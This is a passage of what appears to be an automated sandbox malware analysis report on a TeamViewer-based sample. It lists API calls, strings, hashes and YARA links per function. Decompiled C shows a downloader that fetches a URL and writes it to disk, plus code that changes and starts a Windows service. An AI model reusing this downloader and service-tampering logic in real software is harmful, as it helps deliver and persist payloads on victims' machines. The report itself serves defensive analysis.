                                                                                                                        0x6f333808
                                                                                                                        0x6f333817
                                                                                                                        0x6f33381b
                                                                                                                        0x6f333829
                                                                                                                        0x6f333846
                                                                                                                        0x6f333846
                                                                                                                        0x6f333856
                                                                                                                        0x6f333856
                                                                                                                        0x6f33385d
                                                                                                                        0x6f333864
                                                                                                                        0x6f333870
                                                                                                                        0x6f333881
                                                                                                                        0x6f333881
                                                                                                                        0x6f333890
                                                                                                                        0x6f333890

                                                                                                                        APIs
                                                                                                                        • QueryServiceConfigA.ADVAPI32 ref: 6F3337F9
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000), ref: 6F33380A
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F333811
                                                                                                                        • QueryServiceConfigA.ADVAPI32(?,00000000,?,?), ref: 6F333825
                                                                                                                        • ChangeServiceConfigA.ADVAPI32(?,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6F333846
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33384F
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F333856
                                                                                                                        • QueryServiceStatus.ADVAPI32(?,?), ref: 6F333864
                                                                                                                        • StartServiceA.ADVAPI32(?,?,?), ref: 6F333881
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$Heap$ConfigQuery$Process$AllocChangeFreeStartStatus
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1115209516-0
                                                                                                                        • Opcode ID: 316321dbec79f1ad0a06c4a981634d515364f495dcd244e94ef274cd30321a77
                                                                                                                        • Instruction ID: 6b9c217e72629dd9ae21a3bc7e989c57eb31603a4ef8cae699d9587f01e7282d
                                                                                                                        • Opcode Fuzzy Hash: 316321dbec79f1ad0a06c4a981634d515364f495dcd244e94ef274cd30321a77
                                                                                                                        • Instruction Fuzzy Hash: 3511DF32604754BBE620DA648C4AFBB7BBDEF85B70F40861DF519DA180D732E8158B62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004E1A9C, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 457COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E1AB8
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 0050E96A: __EH_prolog3.LIBCMT ref: 0050E971
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 004BF3A9: __EH_prolog3.LIBCMT ref: 004BF3CB
                                                                                                                          • Part of subcall function 004B94E7: __EH_prolog3.LIBCMT ref: 004B94F5
                                                                                                                          • Part of subcall function 004E177C: __EH_prolog3.LIBCMT ref: 004E179B
                                                                                                                          • Part of subcall function 004E177C: GetModuleFileNameW.KERNEL32(00000000,?,00000104,0000000C), ref: 004E17CE
                                                                                                                          • Part of subcall function 004E177C: PathRemoveFileSpecW.SHLWAPI(?), ref: 004E17DB
                                                                                                                          • Part of subcall function 004E177C: _wcscat_s.LIBCMT ref: 004E17FA
                                                                                                                          • Part of subcall function 004E177C: _memset.LIBCMT ref: 004E1818
                                                                                                                          • Part of subcall function 004E177C: GetPrivateProfileStringW.KERNEL32(Installation,INSTEXE,0077C1F8,?,00000100,?), ref: 004E183F
                                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,0044D1D9,00000000), ref: 004A1804
                                                                                                                          • Part of subcall function 004C125C: __EH_prolog3.LIBCMT ref: 004C1263
                                                                                                                          • Part of subcall function 004C1A4B: __EH_prolog3.LIBCMT ref: 004C1A52
                                                                                                                          • Part of subcall function 0040D53A: char_traits.LIBCPMT ref: 0040D55F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$FileInitialize$DeleteModuleNamePathPrivateProfileRemoveSpecString_memset_wcscat_schar_traits
                                                                                                                        • String ID: - $ExeInfo$MAC$MC.Reg $MC.Register.Failed$Reg
                                                                                                                        • API String ID: 2142787985-157867029
                                                                                                                        • Opcode ID: 4f02a14d7a071371db4ec4a1477779f4146960cec998739b188ed06e7634775f
                                                                                                                        • Instruction ID: 931cd102a136e8241c5f311e7206260e69e1ff52e66e5f491b3fa25d9f698058
                                                                                                                        • Opcode Fuzzy Hash: 4f02a14d7a071371db4ec4a1477779f4146960cec998739b188ed06e7634775f
                                                                                                                        • Instruction Fuzzy Hash: 1412E27080118CEADB11EBA4CD95FED7BB8AF22308F14819EF40667192DB781F48DB65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004BE333, Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 432COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BE340
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                        • GetLastError.KERNEL32(00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004BE3D3
                                                                                                                        • SetLastError.KERNEL32(00000000,00000002,, LE=,00000000,?,?,?,0044D2A4,00000002), ref: 004BE44C
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004FB756: __EH_prolog3_GS.LIBCMT ref: 004FB75D
                                                                                                                          • Part of subcall function 004FB756: _memset.LIBCMT ref: 004FB785
                                                                                                                          • Part of subcall function 004FB756: inet_ntoa.WS2_32(?), ref: 004FB797
                                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,0044D275,00747890,00000000,?,00000000), ref: 004A18C0
                                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,0044D1D9,00000000), ref: 004A1804
                                                                                                                          • Part of subcall function 004A346F: __EH_prolog3.LIBCMT ref: 004A3476
                                                                                                                          • Part of subcall function 004B934F: __EH_prolog3.LIBCMT ref: 004B9356
                                                                                                                          • Part of subcall function 004B934F: GetCurrentThreadId.KERNEL32 ref: 004B9361
                                                                                                                          • Part of subcall function 004B8C51: __EH_prolog3.LIBCMT ref: 004B8C5F
                                                                                                                          • Part of subcall function 004B8C51: GetLocalTime.KERNEL32(?,000001B0), ref: 004B8C70
                                                                                                                          • Part of subcall function 004A2E7D: __EH_prolog3.LIBCMT ref: 004A2E84
                                                                                                                          • Part of subcall function 004BD9DE: __EH_prolog3.LIBCMT ref: 004BD9E9
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$ErrorH_prolog3_Last$CurrentDeleteLocalThreadTime_memset_swprintfinet_ntoa
                                                                                                                        • String ID: $ - $!!!$, LE=
                                                                                                                        • API String ID: 2606616901-592451786
                                                                                                                        • Opcode ID: f022c455c5764106f36873342652e9d3e01d78ef86a039732b7f07f6e76c7f19
                                                                                                                        • Instruction ID: cfd9aa10e2b141b9e46a9bef141b9343a0bcda9aa8dfee9726bdeb6a5042fb4b
                                                                                                                        • Opcode Fuzzy Hash: f022c455c5764106f36873342652e9d3e01d78ef86a039732b7f07f6e76c7f19
                                                                                                                        • Instruction Fuzzy Hash: DA02D47080518CEADB11EB64CD55BDEBB78AF32308F0480DEE44667292DB781F48DB66
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00527490, Relevance: 12.6, APIs: 10, Instructions: 134memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TlsGetValue.KERNEL32(00000032,2F9F5BE6,?,?,?,?,?,00000000,00646158,000000FF,00527677), ref: 005274C3
                                                                                                                        • TlsSetValue.KERNEL32(00000032,00000000), ref: 00527507
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00527532
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00527539
                                                                                                                        • GetProcessHeap.KERNEL32(00000000), ref: 0052757A
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00527581
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00527586
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0052758D
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 005275EE
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005275F5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess$Value
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3709577838-0
                                                                                                                        • Opcode ID: 983a5a466bb6b14d7caf5d2e96df46036674bca2aba397b0b748a8dd607ceb6f
                                                                                                                        • Instruction ID: efe23618da7be0be714c2defb54dae9868633af632c0532a4d351959e9289117
                                                                                                                        • Opcode Fuzzy Hash: 983a5a466bb6b14d7caf5d2e96df46036674bca2aba397b0b748a8dd607ceb6f
                                                                                                                        • Instruction Fuzzy Hash: 3E417E706047249FDB24DF28E884F26FBA4FF8A721F14861CE5168B6D0CB74E945CB91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004BD9DE, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 160fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BD9E9
                                                                                                                        • _fseek.LIBCMT ref: 004BDA6D
                                                                                                                        • _ftell.LIBCMT ref: 004BDA75
                                                                                                                        • DeleteFileW.KERNEL32(?,?,TeamViewer5_Logfile_OLD.log,00000000,?,TeamViewer5_Logfile.log,00000000,?,?,?,?,00000000,00000001,00000048), ref: 004BDAF8
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 004BDB04
                                                                                                                          • Part of subcall function 004A213A: __EH_prolog3.LIBCMT ref: 004A2141
                                                                                                                          • Part of subcall function 004A213A: EnterCriticalSection.KERNEL32(?,00000008,004A18F3,00000000,00000000), ref: 004A214F
                                                                                                                          • Part of subcall function 004A213A: LeaveCriticalSection.KERNEL32(?), ref: 004A2169
                                                                                                                        Strings
                                                                                                                        • TeamViewer5_Logfile.log, xrefs: 004BDA92
                                                                                                                        • TeamViewer5_Logfile_OLD.log, xrefs: 004BDAC7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalFileH_prolog3Section$DeleteEnterLeaveMove_fseek_ftell
                                                                                                                        • String ID: TeamViewer5_Logfile.log$TeamViewer5_Logfile_OLD.log
                                                                                                                        • API String ID: 3462555429-3326806432
                                                                                                                        • Opcode ID: 266f837de3019583d8310fb42b51e15f4c67de9f91ae1b29e7f4c831333e8170
                                                                                                                        • Instruction ID: 941d454ff430ebb6e774a2b5fbba032a6fb3ccfc5e9e5ea10176e806666df5fc
                                                                                                                        • Opcode Fuzzy Hash: 266f837de3019583d8310fb42b51e15f4c67de9f91ae1b29e7f4c831333e8170
                                                                                                                        • Instruction Fuzzy Hash: 3751C871804248EFDB05EFA4CD46EDD7BA4AF25304F4480AEF50657192EB78AF08D755
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004C829D, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004C82A4
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004C82D1
                                                                                                                        • RevertToSelf.ADVAPI32(?,0083E5AC,?,?), ref: 004C8329
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000064,004C57DB), ref: 004C83AB
                                                                                                                        • CloseHandle.KERNEL32(00000001,?,00000064,004C57DB), ref: 004C841B
                                                                                                                        Strings
                                                                                                                        • ImpersonateUser: RevertToSelf failed, xrefs: 004C833D
                                                                                                                        • ImpersonateUser: UnLoadUserProfile failed with error , xrefs: 004C83BF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CloseCriticalCurrentErrorHandleInitializeLastRevertSectionSelfThread
                                                                                                                        • String ID: ImpersonateUser: RevertToSelf failed$ImpersonateUser: UnLoadUserProfile failed with error
                                                                                                                        • API String ID: 3949952964-1656220962
                                                                                                                        • Opcode ID: 61ed9c508e954f94765a574add5277df479cf33997a966e780dbf8020bcd8da0
                                                                                                                        • Instruction ID: c5a483f6a84fb0c669df827afa7862ad503414c6e7d590abcc356b186abaa6fe
                                                                                                                        • Opcode Fuzzy Hash: 61ed9c508e954f94765a574add5277df479cf33997a966e780dbf8020bcd8da0
                                                                                                                        • Instruction Fuzzy Hash: 7751E471C00289DEDB25EFA4CD55AEEBBB4BF14304F14446EE042632A2EB395A04CB59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333180, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 82%
                                                                                                                        			E6F333180(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t21;
				void* _t22;

				_t21 = 0;
				_t22 = HeapAlloc(GetProcessHeap(), 8, 0x800);
				if(_t22 != 0) {
					_t21 = RtlComputeCrc32(0, _t22, wsprintfA(_t22, "%s%s%s%c", _a4, _a8, _a12, 2)) % 0xffffff7f;
					asm("bswap edi");
					HeapFree(GetProcessHeap(), 0, _t22);
				}
				return _t21;
			}





                                                                                                                        0x6f333190
                                                                                                                        0x6f33319b
                                                                                                                        0x6f33319f
                                                                                                                        0x6f3331d5
                                                                                                                        0x6f3331d7
                                                                                                                        0x6f3331dc
                                                                                                                        0x6f3331dc
                                                                                                                        0x6f3331e7

                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6F333192
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F333195
                                                                                                                        • wsprintfA.USER32 ref: 6F3331B8
                                                                                                                        • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 6F3331C4
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 6F3331D9
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3331DC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocComputeCrc32Freewsprintf
                                                                                                                        • String ID: %s%s%s%c
                                                                                                                        • API String ID: 3834306679-489954935
                                                                                                                        • Opcode ID: 126a114c3c73674c5551a03df936bf17308c36b037e18daf4ccad612da5fa3cc
                                                                                                                        • Instruction ID: ae3b06c34e2ca5a5d7f77b5956ace44fa511404ae0d515e7e5a597a12bec6c51
                                                                                                                        • Opcode Fuzzy Hash: 126a114c3c73674c5551a03df936bf17308c36b037e18daf4ccad612da5fa3cc
                                                                                                                        • Instruction Fuzzy Hash: DCF090B7B416A42BE624D6258C8DE7B769EEFC9661F008118FA18D7280CA64DC1286B5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F335A00, Relevance: 12.1, APIs: 8, Instructions: 81networkfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F335A00() {
				char* _v16;
				CHAR* _v36;
				void* _v1048;
				void _v1068;
				long _v1076;
				long _v1080;
				void _v1084;
				void* _v1088;
				long _v1092;
				long _v1096;
				char* _t13;
				long _t23;
				void* _t27;
				long _t33;
				void* _t36;
				void* _t38;

				_t13 = M6F340518; // 0x749bb0
				_t33 = 0;
				_t38 = InternetOpenA(_t13, 0, 0, 0, 0);
				_v1048 = _t38;
				if(_t38 != 0) {
					_t27 = InternetOpenUrlA(_t38, _v16, 0, 0, 0x846a0000, 0);
					if(_t27 != 0) {
						_t36 = CreateFileA(_v36, 0x40000000, 0, 0, 2, 0x80, 0);
						if(_t36 != 0xffffffff) {
							_v1080 = 0;
							_v1076 = 0;
							do {
								if(InternetReadFile(_t27,  &_v1068, 0x400,  &_v1080) == 0) {
									goto L7;
								} else {
									_t23 = _v1096;
									if(_t23 != 0) {
										WriteFile(_t36,  &_v1084, _t23,  &_v1092, 0);
										goto L7;
									}
								}
								break;
								L7:
							} while (_v1096 > 0);
							_t33 = 1;
							CloseHandle(_t36);
							_t38 = _v1088;
						}
						InternetCloseHandle(_t27);
					}
					InternetCloseHandle(_t38);
				}
				return _t33;
			}



















                                                                                                                        0x6f335a06
                                                                                                                        0x6f335a0d
                                                                                                                        0x6f335a1a
                                                                                                                        0x6f335a1c
                                                                                                                        0x6f335a22
                                                                                                                        0x6f335a40
                                                                                                                        0x6f335a44
                                                                                                                        0x6f335a68
                                                                                                                        0x6f335a6d
                                                                                                                        0x6f335a75
                                                                                                                        0x6f335a79
                                                                                                                        0x6f335a83
                                                                                                                        0x6f335a97
                                                                                                                        0x00000000
                                                                                                                        0x6f335a99
                                                                                                                        0x6f335a99
                                                                                                                        0x6f335a9f
                                                                                                                        0x6f335aaf
                                                                                                                        0x00000000
                                                                                                                        0x6f335aaf
                                                                                                                        0x6f335a9f
                                                                                                                        0x00000000
                                                                                                                        0x6f335ab1
                                                                                                                        0x6f335ab1
                                                                                                                        0x6f335ab9
                                                                                                                        0x6f335abe
                                                                                                                        0x6f335ac4
                                                                                                                        0x6f335ac4
                                                                                                                        0x6f335ac9
                                                                                                                        0x6f335acf
                                                                                                                        0x6f335ad1
                                                                                                                        0x6f335ad7
                                                                                                                        0x6f335ae2

                                                                                                                        APIs
                                                                                                                        • InternetOpenA.WININET(00749BB0,00000000,00000000,00000000,00000000), ref: 6F335A14
                                                                                                                        • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,846A0000,00000000), ref: 6F335A3A
                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000), ref: 6F335A62
                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 6F335A93
                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6F335AAF
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F335ABE
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F335AC9
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F335AD1
                                                                                                                        Memory Dump Source
